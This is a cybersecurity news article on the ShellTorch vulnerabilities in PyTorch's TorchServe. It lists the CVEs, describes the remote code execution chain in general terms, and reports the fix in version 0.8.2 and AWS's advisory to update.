December 25, 2024
Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch
Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems. Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities ShellTorch. "These vulnerabilities [...] can lead to a full chain Remote

Oct 03, 2023THNArtificial Intelligence / Cyber Threat

Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems.

Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities ShellTorch.

“These vulnerabilities […] can lead to a full chain Remote Code Execution (RCE), leaving countless thousands of services and end-users — including some of the world’s largest companies — open to unauthorized access and insertion of malicious AI models, and potentially a full server takeover,” security researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz said.

The list of flaws, which have been addressed in version 0.8.2, is as follows –

  • No CVE – Unauthenticated Management Interface API Misconfiguration (0.0.0.0)
  • CVE-2023-43654 (CVSS score: 7.2) – A remote server-side request forgery (SSRF) that leads to remote code execution.
  • CVE-2022-1471 (CVSS score: 9.9) – Use of an insecure version of the SnakeYAML open-source library that allows for unsafe deserialization of Java objects

Successful exploitation of the aforementioned flaws could allow an attacker to send a request to upload a malicious model from an actor-controlled address, leading to arbitrary code execution.

Put in other words, an attacker who can remotely access the management server can also upload a malicious model, which enables code execution without requiring any authentication on any default TorchServe server.

Even more troublingly, the shortcomings could be chained with CVE-2022-1471 to pave the way for code execution and full takeover of exposed instances.

“AI models can include a YAML file to declare their desired configuration, so by uploading a model with a maliciously crafted YAML file, we were able to trigger an unsafe deserialization attack that resulted in code execution on the machine,” the researchers said.

The severity of the issues has prompted Amazon Web Services (AWS) to issue an advisory urging customers using PyTorch inference Deep Learning Containers (DLC) 1.13.1, 2.0.0, or 2.0.1 in EC2, EKS, or ECS released prior to September 11, 2023, update to TorchServe version 0.8.2.

“Using the privileges granted by these vulnerabilities, it is possible to view, modify, steal, and delete AI models and sensitive data flowing into and from the target TorchServe server,” the researchers said.

“Making these vulnerabilities even more dangerous: when an attacker exploits the model serving server, they can access and alter sensitive data flowing in and out from the target TorchServe server, harming the trust and credibility of the application.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.